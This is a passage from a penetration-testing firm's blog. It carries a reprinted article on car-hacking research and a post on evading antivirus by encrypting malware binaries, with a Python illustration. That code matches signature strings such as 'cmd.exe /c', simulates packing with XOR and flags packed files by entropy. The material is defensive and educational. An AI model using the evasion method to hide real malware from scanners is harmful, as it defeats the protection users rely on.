But security experts tell CNET that car hacking is starting to move from the realm of the theoretical to reality, thanks to new wireless technologies and ever more dependence on computers to make cars safer, more energy efficient, and modern.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"Now there are computerized systems and they have control over critical components of cars like gas, brakes, etc.," said Adriel Desautels, chief technology officer and president of <a href="http://www.netragard.com/" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">Netragard</a>, which does vulnerability assessments and penetration testing on all kinds of systems. 
"There is a premature reliance on technology."</p> </td> </tr> <tr> <td colspan="2"> <p /> <table border="0" width="400"> <tr> <td> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"> </p> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"> </p> <p class="image-caption" style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"><span style="font-size: small;">Illustration for a tire pressure monitoring system, with four antennas, from a report detailing how researchers were able to hack the wireless system.</span></p> <span style="font-size: small;"><span class="image-credit" style="font-weight: inherit; font-style: inherit; font-family: inherit; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">(Credit: </span></span><span class="image-credit" style="font-weight: inherit; font-style: inherit; font-size: 16px; font-family: inherit; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"><a href="http://www.winlab.rutgers.edu/~Gruteser/papers/xu_tpms10.pdf" style="font-size: 11px; color: #ff6600; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"><span style="font-size: small;">University of South Carolina, Rutgers University (PDF)</span></a></span><span style="font-size: small;"><span class="image-credit" style="border-color: initial; font-weight: inherit; font-style: inherit; font-family: inherit; text-align: left; vertical-align: baseline; border-width: 0px; padding: 0px; margin: 0px;">) </span></span> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"> </p> </td> <td><img class="cnet-image" 
src="http://i.i.com.com/cnwk.1d/i/tim//2010/08/31/TirePressureMonitoring_2.png" height="233" alt="" style="font-weight: inherit; font-style: inherit; font-size: 16px; font-family: inherit; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;" width="287" /></td> </tr> </table> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Often the innovations are designed to improve the safety of the cars. For instance, after a recall of Firestone tires that were failing in Fords in 2000, Congress passed the TREAD (Transportation Recall Enhancement, Accountability and Documentation) Act that required that tire pressure monitoring systems (TPMS) be installed in new cars to alert drivers if a tire is underinflated.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Wireless tire pressure monitoring systems, which also were touted as a way to increase fuel economy, communicate via a radio frequency transmitter to a tire pressure control unit that sends commands to the central car computer over the Controller-Area Network (CAN). 
The CAN bus, which allows electronics to communicate with each other via the On-Board Diagnostics systems (OBD-II), is then able to trigger a warning message on the vehicle dashboard.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Researchers at the University of South Carolina and Rutgers University tested two tire pressure monitoring systems and found the security to be lacking. They were able to turn the low-tire-pressure warning lights on and off from another car traveling at highway speeds from 40 meters (120 feet) away and using low-cost equipment.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"While spoofing low-tire-pressure readings does not appear to be critical at first, it will lead to a dashboard warning and will likely cause the driver to pull over and inspect the tire," said the report (<a href="http://www.winlab.rutgers.edu/~Gruteser/papers/xu_tpms10.pdf" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">PDF</a>). 
"This presents ample opportunities for mischief and criminal activities, if past experience is any indication."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"TPMS is a major safety system on cars. It's required by law, but it's insecure," said Travis Taylor, one of the researchers who worked on the report. "This can be a problem when considering other wireless systems added to cars. What does that mean about future systems?"</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">The researchers do not intend to be alarmist; they're merely trying to figure out what the security holes are and to alert the industry to them so they can be fixed, said Wenyuan Xu, another researcher on the project. 
"We are trying to raise awareness before things get really serious," she said.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"><a href="http://news.cnet.com/8301-27080_3-20005047-245.html" title="Hacking a car (Q&A) -- Friday, May 14, 2010" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">Another report</a> in May highlighted other risks with the increased use of computers coordinated via internal car networks. Researchers from the University of Washington and University of California, San Diego, tested how easy it would be to compromise a system by connecting a laptop to the onboard diagnostics port that they then wirelessly controlled via a second laptop in another car. Thus, they were able to remotely lock the brakes and the engine, change the speedometer display, as well as turn on the radio and the heat and honk the horn.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Granted, the researchers needed to have physical access to the inside of the car to accomplish the attack. 
Although that minimizes the likelihood of an attack, it's not unthinkable to imagine someone getting access to a car dropped off at the mechanic or parking valet.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"The attack surface for modern automobiles is growing swiftly as more sophisticated services and communications features are incorporated into vehicles," that report (<a href="http://www.autosec.org/pubs/cars-oakland2010.pdf" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: verdana, sans-serif; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">PDF</a>) said. "In the United States, the federally-mandated On-Board Diagnostics port, under the dash in virtually all modern vehicles, provides direct and standard access to internal automotive networks. 
User-upgradable subsystems such as audio players are routinely attached to these same internal networks, as are a variety of short-range wireless devices (Bluetooth, wireless tire pressure sensors, etc.)."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"><strong style="font-weight: bold;">Engine Control Units</strong><br />The ubiquitous Engine Control Units themselves started arriving in cars in the late 1970s as a result of the California Clean Air Act and initially were designed to boost fuel efficiency and reduce pollution by adjusting the fuel and oxygen mixture before combustion, the paper said. "Since then, such systems have been integrated into virtually every aspect of a car's functioning and diagnostics, including the throttle, transmission, brakes, passenger climate and lighting controls, external lights, entertainment, and so on," the report said.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">It's not just that there are so many embedded computers, it's that safety critical systems are not isolated from non-safety critical systems, such as entertainment systems, but are "bridged" together to enable "subtle" interactions, according to the report. 
In addition, automakers are linking Engine Control Units with outside networks like global positioning systems. GM's OnStar system, for example, can detect problems with systems in the car and warn drivers, place emergency calls, and even allow OnStar personnel to remotely unlock cars or stop them, the report said.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">In an article entitled "<a href="http://www.eetimes.com/electronics-blogs/davek-s-embedded-security-blog/4204921/Smart-phone-security-in-cars" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">Smart Phone + Car = Stupid?</a>" on the EETimes site in late July, Dave Kleidermacher noted that GM is adding smartphone connectivity to most of its 2011 cars via OnStar. 
"For the first time, engines can now be started and doors locked by ordinary consumers, from anywhere on the planet with a cell signal," he wrote.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Car manufacturers need to design the systems with security in mind, said Kleidermacher, who is chief technology officer at <a href="http://www.ghs.com/" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; cursor: pointer; padding: 0px; margin: 0px;">Green Hills Software</a>, which builds operating system software that goes into cars and other embedded systems.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"You cannot retrofit high-level security to a system that wasn't designed for it," he told CNET. 
"People are building this sophisticated software into cars and not designing security in it from the ground up, and that's a recipe for disaster."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Representatives from <a href="http://www.onstar.com/web/portal/home" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">GM OnStar</a> were not available for comment late last week or this week, a spokesman said.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"Technology in cars is not designed to be secure because there's no perceived threat. They don't think someone is going to hack a car like they're going to hack a bank," said Desautels of Netragard. "For the interim, network security in cars won't be a primary concern for manufacturers. 
But once they get connected to the Internet and have IP addresses, I think they'll be targeted just for fun."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">The threat is primarily theoretical at this point for a number of reasons. First, there isn't the same financial incentive to hacking cars as there is to hacking online bank accounts. Secondly, there isn't one dominant platform used in cars that can give attackers the same bang for their buck to target as there is on personal computers.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"The risks are certainly increasing because there are more and more computers in the car, but it will be much tougher to (attack) than with the PC," said Egil Juliussen, a principal analyst at market researcher firm <a href="http://www.isuppli.com/" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">iSuppli</a>. "There is no equivalent to Windows in the car, at least not yet, so (a hacker) will be dealing with a lot of different systems and have to have some knowledge about each one. 
It doesn't mean a determined hacker couldn't do it."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">But Juliussen said drivers don't need to worry about anything right now. "This is not a problem this year or next year," he said. "It's five years down the road, but the way to solve it is to build security into the systems now."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"><strong style="font-weight: bold;">Infotainment systems</strong><br />In the meantime, the innovations in mobile communications and entertainment aren't limited to smartphones and iPads. People want to use their devices easily in their cars and take advantage of technology that will let them make calls and listen to music without having to push any buttons or touch any track wheels. 
Hands-free telephony laws in states are requiring this.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Millions of drivers are using the <a style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">SYNC</a> system, which has shipped in more than 2 million Ford cars and lets people connect digital media players and Bluetooth-enabled mobile phones to their car entertainment system and operate them with voice commands. The system uses Microsoft Auto as the operating system. Other cars offer less-sophisticated mobile device connectivity.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"A lot of cars have Bluetooth car kits built into them so you can bring the cell phone into your car and use your phone through microphones and speakers built into the car," said Kevin Finisterre, lead researcher at Netragard. 
"But vendors often leave default passwords."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Ford uses a variety of security measures in SYNC, including only allowing Ford-approved software to be installed at the factory and default security set to Wi-Fi Protected Access 2 (WPA2), which requires users to enter a randomly chosen password to connect to the Internet. To protect customers when the car is on the road and the Mobile Wi-Fi Hot Spot feature is enabled, Ford also uses two firewalls on SYNC, a network firewall similar to a home Wi-Fi router and a separate central processing unit that prevents unauthorized messages from being sent to other modules within the car.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"We use the security models that normal IT folks use to protect an enterprise network," said Jim Buczkowski, global director of electrical and electronics systems engineering for Ford SYNC.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; 
text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Not surprisingly, there is a competing vehicle "infotainment" platform being developed that is based on open-source technology. About 80 companies have formed the <a href="http://www.genivi.org/" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">Genivi Alliance</a> to create open standards and middleware for information and entertainment solutions in cars.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Asked if Genivi is incorporating security into its platform from the get-go, Sebastian Zimmermann, chair of the consortium's product definition and planning group, said it is up to the manufacturers that are creating the branded devices and custom apps to build security in and to take advantage of security mechanisms provided in Linux, the open-source operating system the platform is based on.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"Automakers are aware of security and have taken it seriously...It's increasingly important as the vehicle opens up new interfaces to the outside world," Zimmermann said. 
"They are trying to find a balance between openness and security."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Another can of security worms being opened is the fact that cars may follow the example of smart phones and Web services by getting their own customized third-party apps. Hughes Telematics <a href="http://www.cnn.com/2009/TECH/10/08/apps.realworld/" style="font-size: 11px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">reportedly</a> is working with automakers on app stores for drivers.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">This is already happening to some extent, for instance, with video cameras becoming standard in police cars and school buses, bringing up a host of security and privacy issues.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; 
padding: 0px; margin: 0px;">"We did a penetration test where we had a police agency that has some in-car cameras," Finisterre of Netragard said, "and we were able to access the cameras remotely and have live audio and video streams from the police car due to vulnerabilities in the manufacturing systems."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"I'm sure (eventually) there is going to be smart pavement and smart lighting and other dumb stuff that has the capability of interacting with the car in the future," he said. "Technology is getting pushed out the door with bells and whistles and security gets left behind."</p> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"> </p> </td> </tr> </table> <p class="image-caption" style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> </div> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"><p /><span style="font-weight: 
inherit; font-style: inherit; font-size: 16px; font-family: inherit; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"><br /></span></p></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-72232801507765354542010-08-06T15:52:00.000-07:002010-08-06T18:43:19.360-07:00Bypassing Antivirus to Hack You<div style="text-align: left;">Many people assume that running antivirus software will protect them from malware (viruses, worms, trojans, etc.), but in reality the software is only partially effective. This is true because antivirus software can only detect malware that it knows to look for. Anything that doesn’t match a known malware pattern will pass as a clean and trusted file.</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><div style="text-align: center;"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 287px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLjARroeOUoqIFYgYLRAgfARrbItnIL8AC117NWZsR9h3b1tI1KkPo87-nh4NSpcxoW07PRZDrj5JJg3rEyICcuM7ppikydUy5ghLNDBdG01CYIVd0q29o0nVhL5Nwr97sfhJXVtHhwAU/s400/Screen+shot+2010-08-06+at+8.07.37+PM.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5502462209558502962" /></div></div><div style="text-align: left;"><div style="text-align: center;"><br /></div><div style="text-align: left;">Antivirus technologies use virus definition files to define known malware patterns. Those patterns are derived from real world malware variants that are captured in the wild. It is relatively easy to bypass most antivirus technologies by creating new malware or modifying existing malware so that it does not contain any identifiable patterns.</div><div style="text-align: center;"><br /></div><div style="text-align: left;">One of the modules that our customers can activate when purchasing Penetration Testing services from us is the Pseudo Malware module. As far as we know, we are one of the few Penetration Testing companies to actually use Pseudo Malware during testing. 
This module enables our customers to test how effective their defenses are against real world malware threats, but in a safe and controllable way. </div><div style="text-align: center;"><br /></div><div style="text-align: left;">Our choice of Pseudo Malware depends on the target that we intend to penetrate and the number of systems that we intend to compromise. Sometimes we’ll use Pseudo Malware that doesn’t automatically propagate and other times we’ll use auto-propagation. We should mention that this Pseudo Malware is only “Pseudo” because we don’t do anything harmful with it and we use it ethically. The fact of the matter is that this Pseudo Malware is very real and very capable technology.</div><div style="text-align: center;"><br /></div><div style="text-align: left;">Once we’ve determined which Pseudo Malware variant to go with, we need to augment the Pseudo Malware so that it is not detectable by antivirus scanners. We do this by encrypting the Pseudo Malware binary with a special binary encryption tool. This tool ensures that the binary no longer contains patterns that are detectable by antivirus technologies. 
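<p>As an added illustration (not the post's tool and not Netragard code), the Python below shows why exact-pattern matching misses a re-encoded copy of the same bytes, and one heuristic defenders layer on top of signatures: a Shannon-entropy check that fires on the re-encoded copy precisely because it no longer looks like ordinary code or text. The "definitions", the sample, the seeded XOR stand-in for the encryption step and the 7.0 threshold are all constructed for the demonstration.</p>

```python
"""Pattern-only scanning versus an entropy heuristic on a constructed sample.

Everything here is constructed for the demonstration: the "definitions" are
made-up marker strings and the "sample" is filler bytes, not real malware or
a real vendor definition file. The encoding step stands in for the encryption
the post describes; it is not a real cipher.
"""
import math
import random
from collections import Counter

# Constructed definition file: name -> byte pattern the scanner looks for.
SIGNATURES = {
    "Demo.Marker.A": b"CreateRemoteThread",
    "Demo.Marker.B": b"cmd.exe /c ",
}

# Constructed sample: a fake header, the two marker strings, then low-entropy filler.
SAMPLE = (
    b"MZ" + b"\x00" * 58
    + b"This program cannot be run in DOS mode.\r\n"
    + b"CreateRemoteThread\x00cmd.exe /c \x00"
    + b"A" * 4000
)

# Legitimately compressed data (zip, jpeg, png) is also high-entropy, so this is
# a triage signal that needs corroboration, not a conviction on its own.
ENTROPY_THRESHOLD = 7.0


def signature_scan(data: bytes) -> list[str]:
    """Names of every signature whose byte pattern occurs verbatim in data."""
    return sorted(name for name, pattern in SIGNATURES.items() if pattern in data)


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant file, ~8.0 for random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def simulate_packing(data: bytes, seed: int) -> bytes:
    """Stand-in for the post's encryption step: XOR with a seeded pseudo-random
    keystream. Applying it twice with the same seed restores the input."""
    keystream = random.Random(seed).randbytes(len(data))
    return bytes(a ^ b for a, b in zip(data, keystream))


def triage(data: bytes) -> dict:
    """Combine the exact-pattern scan with the entropy heuristic into one verdict."""
    hits = signature_scan(data)
    entropy = shannon_entropy(data)
    if hits:
        verdict = "known-bad"
    elif entropy >= ENTROPY_THRESHOLD:
        verdict = "suspicious-packed"
    else:
        verdict = "no-finding"
    return {"signature_hits": hits, "entropy": round(entropy, 2), "verdict": verdict}


if __name__ == "__main__":
    packed = simulate_packing(SAMPLE, seed=1234)
    print("original:", triage(SAMPLE))   # signature hits, low entropy
    print("packed:  ", triage(packed))   # no signature hits, but high entropy
```

The two verdicts side by side are the point: the same bytes go from "known-bad" to "no signature hits" after re-encoding, and only the entropy check still has something to say about the file.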
</div><div style="text-align: center;"><br /></div></div><p class="MsoNormal"><b>Before Encryption:</b></p><div style="text-align: center;"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 318px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3_pEf99ISkeNW-FKpKWZM5Mr2yJuH0nuCuPmi4uryfG2L23RUurpDlW4odOaV2iAFaqARO03PYMWg4a7v4NG3KS20ZOb3Sr8gbjWLIW_W5ScGEE5_A8vIP4vTBgU8NymAkUqUBrWtvwQ/s400/dirty.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5502461802106307042" /></div><p class="MsoNormal"><b><br /></b></p><p class="MsoNormal"><b>After Encryption: (Still Infected)</b></p><p class="MsoNormal" style="text-align: center;"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3nQssuGRswXJAGcV6sA3ViLM8Cukc6jhKVs8FqBcKOhewWnskWR8h_7KSQv7ZgH7dy2Bq_Ctq5KW05gpWQHL-_vb7b8kNTD-INUn05dpyfs8Mq2s8lebxJ8uNhG1s811hk1raZNArvJ8/s400/clean.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5502461236207196898" /></p><p class="MsoNormal">As you can see from the scan results above, the Pseudo Malware was detected by most antivirus scanners before it was encrypted. We expected this because we chose a variant of Pseudo Malware that contained several known detectable patterns. The second image shows the same Pseudo Malware being scanned after encryption. 
